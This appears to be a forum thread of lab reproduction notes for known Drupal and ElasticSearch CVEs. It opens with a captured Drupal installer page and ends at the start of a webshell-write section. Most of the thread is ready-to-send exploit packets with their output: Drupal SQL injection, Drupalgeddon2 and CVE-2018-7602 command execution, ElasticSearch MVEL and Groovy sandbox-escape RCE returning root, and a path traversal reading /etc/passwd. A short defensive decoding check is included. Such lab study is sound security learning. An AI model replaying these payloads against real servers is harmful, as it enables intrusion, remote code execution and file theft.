    <title>Select an installation profile | Drupal</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="http://127.0.0.1:8080/misc/favicon.ico" type="image/vnd.microsoft.icon" />
<meta name="Generator" content="Drupal 7 (http://drupal.org)" />
<meta name="robots" content="noindex, nofollow" />
    <style type="text/css" media="all">@import url("http://127.0.0.1:8080/modules/system/system.base.css?0");
@import url("http://127.0.0.1:8080/modules/system/system.admin.css?0");
@import url("http://127.0.0.1:8080/modules/system/system.menus.css?0");
@import url("http://127.0.0.1:8080/modules/system/system.messages.css?0");
@import url("http://127.0.0.1:8080/modules/system/system.theme.css?0");
@import url("http://127.0.0.1:8080/modules/system/system.maintenance.css?0");</style>
<style type="text/css" media="screen">@import url("http://127.0.0.1:8080/themes/seven/reset.css?0");
@import url("http://127.0.0.1:8080/themes/seven/style.css?0");</style>

<!--[if lte IE 8]>
<link type="text/css" rel="stylesheet" href="http://127.0.0.1:8080/themes/seven/ie.css?0" media="all" />
<![endif]-->

<!--[if lte IE 7]>
<link type="text/css" rel="stylesheet" href="http://127.0.0.1:8080/themes/seven/ie7.css?0" media="all" />
<![endif]-->

<!--[if lte IE 6]>
<link type="text/css" rel="stylesheet" href="http://127.0.0.1:8080/themes/seven/ie6.css?0" media="all" />
<![endif]-->
    <script type="text/javascript" src="http://127.0.0.1:8080/misc/jquery.js?v=1.4.4"></script>
<script type="text/javascript" src="http://127.0.0.1:8080/misc/jquery.once.js?v=1.2"></script>
<script type="text/javascript" src="http://127.0.0.1:8080/misc/drupal.js?0"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, {"basePath":"\/","pathPrefix":"","ajaxPageState":{"css":{"modules\/system\/system.base.css":1,"modules\/system\/system.admin.css":1,"modules\/system\/system.menus.css":1,"modules\/system\/system.messages.css":1,"modules\/system\/system.theme.css":1,"modules\/system\/system.maintenance.css":1,"themes\/seven\/reset.css":1,"themes\/seven\/style.css":1,"themes\/seven\/ie.css":1,"themes\/seven\/ie7.css":1,"themes\/seven\/ie6.css":1},"js":{"misc\/jquery.js":1,"misc\/jquery.once.js":1,"misc\/drupal.js":1}}});
//--><!]]>
</script>
  </head>
  <body class="maintenance-page in-maintenance db-offline one-sidebar sidebar-first">

  
  <div id="branding">
    <h1 class="page-title">Select an installation profile</h1>  </div>

  <div id="page">

          <div id="sidebar-first" class="sidebar">
                  <img id="logo" src="http://127.0.0.1:8080/themes/seven/logo.png" alt="Drupal" />
                <h2 class="element-invisible">Installation tasks</h2><ol class="task-list"><li class="active">Choose profile<span class="element-invisible">(active)</span></li><li>Choose language</li><li>Verify requirements</li><li>Set up database</li><li>Install profile</li><li>Configure site</li><li>Finished</li></ol>      </div>
   
    <div id="content" class="clearfix">
                  <form action="/install.php" method="post" id="install-select-profile-form" accept-charset="UTF-8"><div><div class="form-item form-type-radio form-item-profile">
<input type="radio" id="edit-profile--2" name="profile" value="standard" checked="checked" class="form-radio" />  <label class="option" for="edit-profile--2">Standard </label>

<div class="description">Install with commonly used features pre-configured.</div>
</div>
<div class="form-item form-type-radio form-item-profile">
<input type="radio" id="edit-profile--3" name="profile" value="minimal" class="form-radio" />  <label class="option" for="edit-profile--3">Minimal </label>

<div class="description">Start with only a few modules enabled.</div>
</div>
<input type="hidden" name="form_build_id" value="form-v-NcW4JwzmXoW7EqzmTvKHcg8-PO4b9-DqSF8B6HHgE" />
<input type="hidden" name="form_id" value="install_select_profile_form" />
<div class="form-actions form-wrapper" id="edit-actions"><input type="submit" id="edit-submit" name="op" value="Save and continue" class="form-submit" /></div></div></form>    </div>
```

![image-20211030202215466](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030202215466.png)

Use the default installation method and fill in the information as follows:

![image-20211030202431921](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030202431921.png)

After finishing the environment configuration it looks roughly like this (though maybe something I entered was wrong):

![image-20211030202754928](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030202754928.png)

Capture the request with Burp Suite and modify the packet as follows:

```
POST /?q=node&destination=node HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a


```

After sending, the following (error) information is returned:

```
    Warning: mb_strlen() expects parameter 1 to be string, array given in drupal_strlen() (line 478 of /var/www/html/includes/unicode.inc).
    Warning: addcslashes() expects parameter 1 to be string, array given in DatabaseConnection->escapeLike() (line 984 of /var/www/html/includes/database/database.inc).
    PDOException: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ' root@172.18.0.3': SELECT * FROM {users} WHERE name = :name_0 or updatexml(0,concat(0xa,user()),0)#, :name_0 AND status = 1; Array ( [:name_0 or updatexml(0,concat(0xa,user()),0)#] => bob [:name_0] => a ) in user_login_authenticate_validate() (line 2149 of /var/www/html/modules/user/user.module).
```

![image-20211030203505002](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030203505002.png)

## Drupal Core 8 PECL YAML deserialization arbitrary code execution vulnerability (CVE-2017-6920)

Setting up this environment is a hassle; I'll write it up next time....





## Drupal Drupalgeddon 2 remote code execution vulnerability (CVE-2018-7600)

Opening it looks like this:

![image-20211030204851973](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030204851973.png)

Capture the request directly and modify the packet contents as follows:

```
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id


```

Send the packet to the Repeater module and click Send; the response contains the following:



## Drupal remote code execution vulnerability (CVE-2018-7602)

Drupal handles requests of the form `path?destination=URL`. The URL in `destination=URL` must be URL-encoded when the request is made; when the `#` in the URL is encoded twice, the filtering in the `sanitize()` function can be bypassed.

Construct a special request to bypass the filtering code

```text
POST /drupal-7.59/drupal-7.59/node/9/delete?destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami
```

Here `%2523` is the double URL encoding of `#`.

The web middleware decodes `%2523` and obtains `%23`

This bypasses the `sanitize()` and `stripDangerousValues` function checks.

When the Drupal application processes the `destination URL`, it decodes `%23` again and obtains `#`.

parse_str is used and the result stored in options; further steps are needed to trigger the vulnerability.
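As an added defender-side example (not from the post and not Drupal's own code), the Python below decodes a `destination` value until it stops changing and only then inspects it, so a check written against the fully decoded form cannot be sidestepped by encoding `#` twice. The sample values are constructed from the request above; the notion of a "render key" (a query key segment starting with `#`) is an assumption used for the check.

```python
"""Detect multiply URL-encoded input by decoding to a fixed point before checking it."""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Constructed samples based on the request above: '#' encoded twice (%2523),
# once (%23), and a benign destination with no percent-encoding at all.
DOUBLE_ENCODED = "node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami"
SINGLE_ENCODED = "node?q[%23][]=passthru"
BENIGN = "node/1?page=2"

_BRACKET_SEGMENT = re.compile(r"\[([^\]]*)\]")


def decode_fully(value: str, max_rounds: int = 5) -> Tuple[str, int]:
    """Percent-decode repeatedly until the value is stable.

    Returns the stable value and the number of rounds that changed it, so a
    caller can see that '%2523' needed two rounds to become '#'.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def query_key_segments(decoded: str) -> List[str]:
    """Split 'q[#type]=markup&x=1' into its key segments: ['q', '#type', 'x']."""
    _, _, query = decoded.partition("?")
    segments: List[str] = []
    for param in filter(None, query.split("&")):
        key = param.split("=", 1)[0]
        segments.append(key.split("[", 1)[0])        # top-level name
        segments.extend(_BRACKET_SEGMENT.findall(key))  # nested array keys
    return segments


def has_render_keys(decoded: str) -> bool:
    """True if any key segment starts with '#' (would become a render-array property)."""
    return any(seg.startswith("#") for seg in query_key_segments(decoded))


def assess_destination(raw: str) -> Dict[str, object]:
    """Judge a raw destination: decode to a fixed point, then check that form."""
    decoded, rounds = decode_fully(raw)
    render_keys = has_render_keys(decoded)
    return {
        "decoded": decoded,
        "encoding_rounds": rounds,
        "render_keys": render_keys,
        # Reject anything multiply encoded or carrying '#' keys after full decoding.
        "accept": rounds <= 1 and not render_keys,
    }


if __name__ == "__main__":
    for sample in (DOUBLE_ENCODED, SINGLE_ENCODED, BENIGN):
        print(assess_destination(sample))
```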







## ElasticSearch command execution vulnerability (CVE-2014-3120) test environment

Opening it looks like this:

```
{
  "status" : 200,
  "name" : "Straw Man",
  "version" : {
    "number" : "1.1.1",
    "build_hash" : "f1585f096d3f3985e73456debdc1a0745f512bbc",
    "build_timestamp" : "2014-04-16T14:27:12Z",
    "build_snapshot" : false,
    "lucene_version" : "4.7"
  },
  "tagline" : "You Know, for Search"
}

```

![image-20211030212713995](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030212713995.png)

The MVEL code for executing commands is as follows:

```
import java.io.*;
new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();
```

Put the Java code into the JSON:

```
{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
  }
```

First, this vulnerability requires at least one record to exist in ES, so we need to create one first; modify the packet contents as follows:

```
POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}
```

The result is as follows:

```
{
  "status" : 200,
  "name" : "Straw Man",
  "version" : {
    "number" : "1.1.1",
    "build_hash" : "f1585f096d3f3985e73456debdc1a0745f512bbc",
    "build_timestamp" : "2014-04-16T14:27:12Z",
    "build_snapshot" : false,
    "lucene_version" : "4.7"
  },
  "tagline" : "You Know, for Search"
}

```

![image-20211030213257681](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030213257681.png)

Then, to execute arbitrary code, capture the request and modify the packet contents as follows:

```
POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}
```

![image-20211030213604829](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030213604829.png)

The result, as shown:

```
{
  "took" : 241,
  "timed_out" : false,
  "_shards" : {
    "total" : 5,
    "successful" : 5,
    "failed" : 0
  },
  "hits" : {
    "total" : 2,
    "max_score" : 1.0,
    "hits" : [ {
      "_index" : "website",
      "_type" : "blog",
      "_id" : "MjQNrzvsQeK5F0gBQbyCfQ",
      "_score" : 1.0,
      "fields" : {
        "command" : [ "uid=0(root) gid=0(root) groups=0(root)\n" ]
      }
    } ]
  }
}

```

Original poster | Posted on 2021-10-31 22:26:24
## ElasticSearch Groovy sandbox bypass && code execution vulnerability (CVE-2015-1427) test environment

### Principle

ElasticSearch supports the "sandboxed" Groovy language for dynamic scripts, but clearly the official sandboxing was not done well. lupin and tang3 each proposed a way to execute commands:

> Since executing Java code is sandboxed, lupin's method is to find a way around the sandbox, for example with Java reflection
> Groovy is a language in its own right, so tang3 took a different route and used methods supported by the Groovy language to execute commands directly, without going through Java

So, following these two approaches, we can obtain two different POCs.

Java sandbox bypass method:

```
java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
```

Groovy direct command execution method:

```
def command='id';def res=command.execute().text;res
```



### Reproduction

Opening it looks like this (visit IP address:9200):

```
{
  "status" : 200,
  "name" : "Cyclops",
  "cluster_name" : "elasticsearch",
  "version" : {
    "number" : "1.4.2",
    "build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",
    "build_timestamp" : "2014-12-16T14:11:12Z",
    "build_snapshot" : false,
    "lucene_version" : "4.10.2"
  },
  "tagline" : "You Know, for Search"
}
```

![image-20211031094854311](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211031094854311.png)

Since a query requires at least one record in ES, send the following packet to add one:

```
POST /website/blog/ HTTP/1.1
Host: 127.0.0.1:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "test"
}
```

![image-20211031095450377](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211031095450377.png)

The following result is returned:

```
{"_index":"website","_type":"blog","_id":"AXzUDsNy0zGz1Fo_rTP2","_version":1,"created":true}
```

![image-20211031095519095](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211031095519095.png)

Then send the packet containing the payload to execute arbitrary commands:

```
POST /_search?pretty HTTP/1.1
Host: 127.0.0.1:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}


```

![image-20211031095636055](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211031095636055.png)

Click Forward:

```
{
  "took" : 5213,
  "timed_out" : false,
  "_shards" : {
    "total" : 5,
    "successful" : 5,
    "failed" : 0
  },
  "hits" : {
    "total" : 1,
    "max_score" : 1.0,
    "hits" : [ {
      "_index" : "website",
      "_type" : "blog",
      "_id" : "AXzUDsNy0zGz1Fo_rTP2",
      "_score" : 1.0,
      "fields" : {
        "lupin" : [ "uid=0(root) gid=0(root) groups=0(root)\n" ]
      }
    } ]
  }
}
```

![image-20211031095703452](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211031095703452.png)

Original poster | Posted on 2021-11-5 22:06:35
My morale collapsed: my computer broke and what I had written before is gone....
Luckily it had already been posted; from now on I'll learn my lesson and write one document per reproduction....



# ElasticSearch directory traversal vulnerability (CVE-2015-5531)

Opening it looks like this:

```
{
  "status" : 200,
  "name" : "Persuader",
  "cluster_name" : "elasticsearch",
  "version" : {
    "number" : "1.6.0",
    "build_hash" : "cdd3ac4dde4f69524ec0a14de3828cb95bbb86d0",
    "build_timestamp" : "2015-06-09T13:36:34Z",
    "build_snapshot" : false,
    "lucene_version" : "4.10.4"
  },
  "tagline" : "You Know, for Search"
}

```

![image-20211105195347376](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105195347376.png)

Capture the request directly with Burp Suite and modify the packet as follows:

## Create a repository

```
PUT /_snapshot/test HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

{
    "type": "fs",
    "settings": {
        "location": "/usr/share/elasticsearch/repo/test"
    }
}

```

![image-20211105195053508](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105195053508.png)

After clicking Forward, the following is returned:

![image-20211105195557411](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105195557411.png)

![image-20211105195546077](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105195546077.png)

## Create a snapshot

Continue capturing with Burp Suite and modify the packet as follows:

```
PUT /_snapshot/test2 HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

{
    "type": "fs",
    "settings": {
        "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
    }
}


```

After clicking Forward you get the following:

```json
{"acknowledged":true}
```

## Directory traversal to read arbitrary files

Visit

`http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd`

capture the request and send it to the Repeater module.

You get the following:

```http
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=UTF-8
Content-Length: 4305

{"error":"ElasticsearchParseException[Failed to derive xcontent from (offset=0, length=919): [114, 111, 111, 116, 58, 120, 58, 48, 58, 48, 58, 114, 111, 111, 116, 58, 47, 114, 111, 111, 116, 58, 47, 98, 105, 110, 47, 98, 97, 115, 104, 10, 100, 97, 101, 109, 111, 110, 58, 120, 58, 49, 58, 49, 58, 100, 97, 101, 109, 111, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 105, 110, 58, 120, 58, 50, 58, 50, 58, 98, 105, 110, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 115, 58, 120, 58, 51, 58, 51, 58, 115, 121, 115, 58, 47, 100, 101, 118, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 110, 99, 58, 120, 58, 52, 58, 54, 53, 53, 51, 52, 58, 115, 121, 110, 99, 58, 47, 98, 105, 110, 58, 47, 98, 105, 110, 47, 115, 121, 110, 99, 10, 103, 97, 109, 101, 115, 58, 120, 58, 53, 58, 54, 48, 58, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 110, 58, 120, 58, 54, 58, 49, 50, 58, 109, 97, 110, 58, 47, 118, 97, 114, 47, 99, 97, 99, 104, 101, 47, 109, 97, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 112, 58, 120, 58, 55, 58, 55, 58, 108, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 108, 112, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 105, 108, 58, 120, 58, 56, 58, 56, 58, 109, 97, 105, 108, 58, 47, 118, 97, 114, 47, 109, 97, 105, 108, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 101, 119, 115, 58, 120, 58, 57, 58, 57, 58, 110, 101, 119, 115, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 110, 101, 119, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 
111, 108, 111, 103, 105, 110, 10, 117, 117, 99, 112, 58, 120, 58, 49, 48, 58, 49, 48, 58, 117, 117, 99, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 117, 117, 99, 112, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 112, 114, 111, 120, 121, 58, 120, 58, 49, 51, 58, 49, 51, 58, 112, 114, 111, 120, 121, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 119, 119, 119, 45, 100, 97, 116, 97, 58, 120, 58, 51, 51, 58, 51, 51, 58, 119, 119, 119, 45, 100, 97, 116, 97, 58, 47, 118, 97, 114, 47, 119, 119, 119, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 97, 99, 107, 117, 112, 58, 120, 58, 51, 52, 58, 51, 52, 58, 98, 97, 99, 107, 117, 112, 58, 47, 118, 97, 114, 47, 98, 97, 99, 107, 117, 112, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 105, 115, 116, 58, 120, 58, 51, 56, 58, 51, 56, 58, 77, 97, 105, 108, 105, 110, 103, 32, 76, 105, 115, 116, 32, 77, 97, 110, 97, 103, 101, 114, 58, 47, 118, 97, 114, 47, 108, 105, 115, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 105, 114, 99, 58, 120, 58, 51, 57, 58, 51, 57, 58, 105, 114, 99, 100, 58, 47, 118, 97, 114, 47, 114, 117, 110, 47, 105, 114, 99, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 103, 110, 97, 116, 115, 58, 120, 58, 52, 49, 58, 52, 49, 58, 71, 110, 97, 116, 115, 32, 66, 117, 103, 45, 82, 101, 112, 111, 114, 116, 105, 110, 103, 32, 83, 121, 115, 116, 101, 109, 32, 40, 97, 100, 109, 105, 110, 41, 58, 47, 118, 97, 114, 47, 108, 105, 98, 47, 103, 110, 97, 116, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 111, 98, 111, 100, 121, 58, 120, 58, 54, 53, 53, 51, 52, 58, 54, 53, 53, 51, 52, 58, 110, 111, 98, 111, 100, 121, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 
101, 110, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 95, 97, 112, 116, 58, 120, 58, 49, 48, 48, 58, 54, 53, 53, 51, 52, 58, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 98, 105, 110, 47, 102, 97, 108, 115, 101, 10]]","status":400}
```

Use the console in the browser's developer tools to decode the ASCII codes:

```
String.fromCharCode(114, 111, 111, 116, 58, 120, 58, 48, 58, 48, 58, 114, 111, 111, 116, 58, 47, 114, 111, 111, 116, 58, 47, 98, 105, 110, 47, 98, 97, 115, 104, 10, 100, 97, 101, 109, 111, 110, 58, 120, 58, 49, 58, 49, 58, 100, 97, 101, 109, 111, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 105, 110, 58, 120, 58, 50, 58, 50, 58, 98, 105, 110, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 115, 58, 120, 58, 51, 58, 51, 58, 115, 121, 115, 58, 47, 100, 101, 118, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 110, 99, 58, 120, 58, 52, 58, 54, 53, 53, 51, 52, 58, 115, 121, 110, 99, 58, 47, 98, 105, 110, 58, 47, 98, 105, 110, 47, 115, 121, 110, 99, 10, 103, 97, 109, 101, 115, 58, 120, 58, 53, 58, 54, 48, 58, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 110, 58, 120, 58, 54, 58, 49, 50, 58, 109, 97, 110, 58, 47, 118, 97, 114, 47, 99, 97, 99, 104, 101, 47, 109, 97, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 112, 58, 120, 58, 55, 58, 55, 58, 108, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 108, 112, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 105, 108, 58, 120, 58, 56, 58, 56, 58, 109, 97, 105, 108, 58, 47, 118, 97, 114, 47, 109, 97, 105, 108, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 101, 119, 115, 58, 120, 58, 57, 58, 57, 58, 110, 101, 119, 115, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 110, 101, 119, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 117, 117, 99, 112, 58, 120, 58, 49, 48, 
58, 49, 48, 58, 117, 117, 99, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 117, 117, 99, 112, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 112, 114, 111, 120, 121, 58, 120, 58, 49, 51, 58, 49, 51, 58, 112, 114, 111, 120, 121, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 119, 119, 119, 45, 100, 97, 116, 97, 58, 120, 58, 51, 51, 58, 51, 51, 58, 119, 119, 119, 45, 100, 97, 116, 97, 58, 47, 118, 97, 114, 47, 119, 119, 119, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 97, 99, 107, 117, 112, 58, 120, 58, 51, 52, 58, 51, 52, 58, 98, 97, 99, 107, 117, 112, 58, 47, 118, 97, 114, 47, 98, 97, 99, 107, 117, 112, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 105, 115, 116, 58, 120, 58, 51, 56, 58, 51, 56, 58, 77, 97, 105, 108, 105, 110, 103, 32, 76, 105, 115, 116, 32, 77, 97, 110, 97, 103, 101, 114, 58, 47, 118, 97, 114, 47, 108, 105, 115, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 105, 114, 99, 58, 120, 58, 51, 57, 58, 51, 57, 58, 105, 114, 99, 100, 58, 47, 118, 97, 114, 47, 114, 117, 110, 47, 105, 114, 99, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 103, 110, 97, 116, 115, 58, 120, 58, 52, 49, 58, 52, 49, 58, 71, 110, 97, 116, 115, 32, 66, 117, 103, 45, 82, 101, 112, 111, 114, 116, 105, 110, 103, 32, 83, 121, 115, 116, 101, 109, 32, 40, 97, 100, 109, 105, 110, 41, 58, 47, 118, 97, 114, 47, 108, 105, 98, 47, 103, 110, 97, 116, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 111, 98, 111, 100, 121, 58, 120, 58, 54, 53, 53, 51, 52, 58, 54, 53, 53, 51, 52, 58, 110, 111, 98, 111, 100, 121, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 
108, 111, 103, 105, 110, 10, 95, 97, 112, 116, 58, 120, 58, 49, 48, 48, 58, 54, 53, 53, 51, 52, 58, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 98, 105, 110, 47, 102, 97, 108, 115, 101, 10)
"root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
```

# Elasticsearch webshell write vulnerability (WooYun-2015-110216)

## Principle

ElasticSearch has a data backup feature: the user can pass in a path and have data backed up under it, and both the file name and the extension are controllable.

